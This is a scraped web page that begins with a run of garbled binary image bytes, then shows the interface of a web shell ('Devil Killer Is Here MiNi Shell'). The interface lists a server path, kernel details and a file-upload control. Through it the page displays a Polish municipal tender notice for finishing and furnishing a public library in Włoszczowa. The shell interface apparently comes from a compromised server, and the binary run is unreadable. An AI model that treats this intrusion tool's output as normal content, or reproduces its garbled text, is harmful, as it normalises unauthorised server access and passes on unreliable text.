JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151012/270074-N-2015.html

<p class="kh_header"><b>Włoszczowa: Budowa obiektu Biblioteki Publicznej we Włoszczowie - roboty wykończeniowe i wyposażenie obiektu</b><br>
<b>Numer ogłoszenia: 270074 - 2015; data zamieszczenia: 12.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Włoszczowa , ul. Partyzantów 14, 29-100 Włoszczowa, woj. świętokrzyskie, tel. 041 3942669 w. 104, faks 041 3942339.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina-wloszczowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa obiektu Biblioteki Publicznej we Włoszczowie - roboty wykończeniowe i wyposażenie obiektu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlano-montażowe oraz dostawa i montaż wyposażenia w celu realizacji projektu pn. Budowa obiektu Biblioteki Publicznej we Włoszczowie - roboty wykończeniowe i wyposażenie obiektu.
Zamawiający  dokonuje  podziału przedmiotu   zamówienia  na 3 części : 
Część I - Roboty budowlano- montażowe
Część II -  Dostawa  i montaż  wyposażenia  mebli , regałów,   gablot krzeseł , wykonanie oraz  instalacja napisu 
Część III - Dostawa , montaż  i uruchomienie  sprzętu elektronicznego.   
Wykonawca jest uprawniony do złożenia oferty na  jedną,  dwie lub wszystkie  części.
Wykonawca jest zobowiązany uwzględnić,   iż w  związku z podziałem  przedmiotu zamówienia na części  w przypadku gdy  poszczególne części  będą wykonywane przez różnych wykonawców  w tym samym czasie, będzie  zobowiązany  do współdziałania w zakresie   korzystania z placu budowy na warunkach określonych w  porozumieniu zawartym miedzy wykonawcami. Porozumienie   będzie   sporządzone przed zawarciem umowy na udzielenie zamówienia  publicznego   po  opracowaniu  harmonogramu  robót  przez poszczególnych  wykonawców.  
OPIS CZĘŚCI  ZAMÓWIENIA. 
Zakres przedmiotowy Części I   zamówienia  obejmuje : 
Roboty wykończeniowe w zakresie wykładzin ceramicznych ściennych i podłogowych w ilości 700m2 wykończonych cokolikami tego samego rodzaju i koloru, wykładzin PCV i dywanowych w ilości 385m2 wykończonych listwami PCV dobranymi kolorystycznie do wykładzin, zewnętrznych posadzek granitowych stopni schodowych podstopnic oraz podjazdu dla osób niepełnosprawnych  i murków przyległych o grubości okładziny.2cm. w ilości ogólnej 70 m2 , posadzek zewnętrznych stopni schodowych z gresu mrozoodpornego w ilości 34,02 m2. Roboty w zakresie ślusarki - wykonanie i montaż  poręczy i balustrad schodowych ze stali nierdzewnej typu 304 wewnątrz i na zewnątrz budynku. 
Szczegółowy zakres  robót do wykonania, określają załączniki:
1.projekt budowlany (załączniki  Nr 1do SIWZ), 
2.projekt wykonawczy (załączniki  Nr 2 do SIWZ), 
3.rysunki zamienne schodów zewnętrznych oraz podjazdu dla osób niepełnosprawnych (załączniki  Nr 3 do SIWZ),
4.rysunki balustrad (załączniki  Nr 4 do SIWZ), 
5.projekt kolorystyki wnętrz (załączniki  Nr 5 do SIWZ),
6.specyfikacje techniczne wykonania i  odbioru robót /STWIOR/ (załączniki  Nr 6 do SIWZ),
7.wizualizacje  (załączniki  Nr 7 do SIWZ),
8.przekroje łazienki  (załączniki  Nr 8 do SIWZ),
zamieszczone wraz z materiałami przetargowymi na stronie internetowej Zamawiającego.
Wykonawca składający ofertę na część nr. 1 zamówienia wpisuje w formularzu ofertowym cenę za wykonanie tej części zamówienia w pkt. 2 formularza oferty dla robót budowlanych i załącza do oferty kosztorys ofertowy na realizację tej części zamówienia.
Zakres przedmiotowy Części II   zamówienia obejmuje : 
Dostawę i montaż wyposażenia - meble, gabloty, regały, krzesła, tapicerka, rolety oraz wykonanie  napisu  przestrzennego  na budynku - zgodnie  z opisem  w załączniku nr 10 do SIWZ Zestawienie  wyposażenia  - meble, regały, gabloty, krzesła oraz  w załączniku nr 9 do SIWZ   Napis przestrzenny na budynku.
Wykonawca składający ofertę na część 2 zamówienia  podaje w formularzu oferty w pk. 2 cenę za realizację danej części zamówienia i załącza do oferty  zestawienie oferowanego sprzętu z podaniem cen jednostkowych poszczególnych elementów.  
Zakres  przedmiotowy Część III zamówienia  obejmuje :
Dostawę  i instalację i uruchomienie  sprzętu elektronicznego  - zgodnie z opisem  w załączniku nr 11 do SIWZ Zestawienie wyposażenia -  sprzęt elektroniczny. 
Wykonawca składający ofertę na część 3   zamówienia  podaje w formularzu oferty w pk.2 cenę za realizację danej części zamówienia i załącza do oferty  zestawienie oferowanego sprzętu z podaniem cen jednostkowych poszczególnych elementów.  
Jeżeli,   w  opisie przedmiotu zamówienia  dla  Części I , II i III   Zamawiający wskazuje dla niektórych materiałów, wyrobów i urządzeń nazwy, znaki towarowe  lub pochodzenie to wszystkie użyte nazwy, znaki towarowe, pochodzenie  mają tylko takie znaczenie, że określają  minimalne  parametry techniczne i jakościowe  wyrobów,  urządzeń  oraz materiałów, których   wymaga Zamawiający   do wykonania przedmiotu zamówienia.  Zamawiający dopuszcza  w tych przypadkach  zastosowanie  innych materiałów, wyrobów i urządzeń  niż wskazane w opisie przedmiotu zamówienia  z tym  zastrzeżeniem,  iż oferowane  materiały  wyroby i urządzenia  będą posiadały parametry techniczne i jakościowe  nie gorsze  niż określone  w  opisie przedmiotu zamówienia (materiały, wyroby, urządzenia równoważne). 
Wykonawca, który przewiduje  stosowanie  materiałów, wyrobów i urządzeń  równoważnych w stosunku do tych  wskazanych w  opisie  przedmiotu zamówienia   ma obowiązek  wykazać   równoważność  produktów  oferowanych.  W tym celu Wykonawca dla : 
a)Części I w kosztorysie  ofertowym 
b)Części II w wykazie  wyposażenia 
c)Części  III  w wykazie  sprzętu elektronicznego
jest zobowiązany  wskazać   jakie konkretnie materiały, wyroby lub urządzenia   oferuje z opisem  ich  cech  technicznych i jakościowych  ze szczegółowością nie mniejszą niż zawarta w opisie przedmiotu zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 39.10.00.00-3, 45.30.00.00-0, 45.31.12.00-7, 45.33.20.00-3, 45.33.10.00-6, 45.42.00.00-7, 45.00.00.00-7, 45.21.00.00-2, 30.21.30.00-5, 48.82.00.00-2, 32.42.00.00-3, 32.32.24.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.02.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. w wysokości po 3 000,00 zł. dla  każdej      z części zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części I  przez to rozumie się,  wykonanie  w okresie  ostatnich 5 lat  co najmniej  dwóch zamówień  odpowiadających swoim rodzajem i zakresem robotom  stanowiącym przedmiot zamówienia, o wartości nie mniejszej niż 80 000,00 zł brutto (osiemdziesiąt tysięcy złotych brutto)  wraz z podaniem ich rodzaju i wartości, daty 
i miejsca wykonania wraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej 
i prawidłowo ukończone;
Dla Części II przez to rozumie się,   wykonanie  w okresie  ostatnich 3 lat co najmniej jednej dostawy  o wartości nie mniejszej niż 80 000,00zł brutto (osiemdziesiąt tysięcy złotych brutto odpowiadające swoim rodzajem przedmiotowi zamówienia, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;
Dla Części III przez to rozumie się,  wykonanie  w okresie  ostatnich 3 lat co najmniej jednej dostawy o wartości nie mniejszej niż 80 000,00zł brutto (osiemdziesiąt tysięcy złotych brutto) odpowiadające swoim rodzajem przedmiotowi zamówienia, wraz 
z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
Ocena spełnienia warunków  będzie dokonywana metoda spełnia nie spełnia  na podstawie oświadczeń i dokumentów złożonych  przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części  I  przez to rozumienie  się dysponowanie osobą  kierownika budowy 
z uprawnieniami budowlanymi w specjalności konstrukcyjno-budowlanej.
Ocena spełnienia warunku  będzie dokonywana metoda spełnia nie spełnia  na podstawie oświadczeń i dokumentów złożonych  przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części I  przez to rozumie się posiadanie ubezpieczenia  od odpowiedzialności cywilnej na kwotę nie mniejszą niż 80 000 zł w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Dla Części II  przez to rozumie się posiadanie ubezpieczenia  od odpowiedzialności cywilnej na kwotę nie mniejszą niż 80 000 zł w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Dla Części III przez to rozumie się posiadanie ubezpieczenia od odpowiedzialności cywilnej na kwotę nie mniejszą niż 80 000 zł w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełnienia warunków  będzie dokonywana metoda spełnia nie spełnia  na podstawie oświadczeń i dokumentów złożonych  przez Wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy dla części I , wykaz dostaw dla części II i części III</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana  umowy po jej zawarciu  jest  dopuszczalne jedynie w przypadkach wskazanych w jej treści.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.eobip.wloszczowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Włoszczowa, ul. Partyzantów 14,  29-100 Włoszczowa pokój nr 38.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2015 godzina 12:00, miejsce: Urząd Gminy Włoszczowa, ul. Partyzantów 14,  29-100 Włoszczowa pokój nr 17 -sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty budowlano- montażowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy Części I zamówienia  obejmuje : 
Roboty wykończeniowe w zakresie wykładzin ceramicznych ściennych i podłogowych w ilości 700m2 wykończonych cokolikami tego samego rodzaju i koloru, wykładzin PCV i dywanowych w ilości 385m2 wykończonych listwami PCV dobranymi kolorystycznie do wykładzin, zewnętrznych posadzek granitowych stopni schodowych podstopnic oraz podjazdu dla osób niepełnosprawnych  i murków przyległych o grubości okładziny.2cm. w ilości ogólnej 70 m2 , posadzek zewnętrznych stopni schodowych z gresu mrozoodpornego w ilości 34,02 m2. Roboty w zakresie ślusarki - wykonanie i montaż  poręczy i balustrad schodowych ze stali nierdzewnej typu 304 wewnątrz i na zewnątrz budynku. 
Szczegółowy zakres  robót do wykonania, określają załączniki:
1.	projekt budowlany (załączniki  Nr 1do SIWZ), 
2.	projekt wykonawczy (załączniki  Nr 2 do SIWZ), 
3.	rysunki zamienne schodów zewnętrznych oraz podjazdu dla osób niepełnosprawnych (załączniki  Nr 3 do SIWZ),
4.	rysunki balustrad (załączniki  Nr 4 do SIWZ), 
5.	projekt kolorystyki wnętrz (załączniki  Nr 5 do SIWZ),
6.	specyfikacje techniczne wykonania i  odbioru robót /STWIOR/ (załączniki  Nr 6 do SIWZ),
7.	 wizualizacje  (załączniki  Nr 7 do SIWZ),
8.	Przekroje łazienki  (załączniki  Nr 8 do SIWZ),
zamieszczone wraz z materiałami przetargowymi na stronie internetowej Zamawiającego.
Wykonawca składający ofertę na część nr. 1 zamówienia wpisuje w formularzu ofertowym cenę za wykonanie tej części zamówienia w pkt. 2 formularza oferty dla robót budowlanych i załącza do oferty kosztorys ofertowy na realizację tej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2, 45.30.00.00-0, 45.31.12.00-2, 45.33.11.00-7, 45.33.20.00-3, 45.33.23.00-7, 45.33.10.00-6, 45.42.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa  i montaż  wyposażenia  mebli, regałów,   gablot, krzeseł, wykonanie oraz  instalacja napisu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy Części II  zamówienia obejmuje : 
Dostawę i montaż wyposażenia - meble, gabloty, regały, krzesła, tapicerka, rolety oraz wykonanie  napisu  przestrzennego  na budynku - zgodnie  z opisem  w załączniku nr 10 do SIWZ Zestawienie  wyposażenia  - meble, regały, gabloty, krzesła oraz w załączniku nr 9 do SIWZ. Napis przestrzenny na budynku.
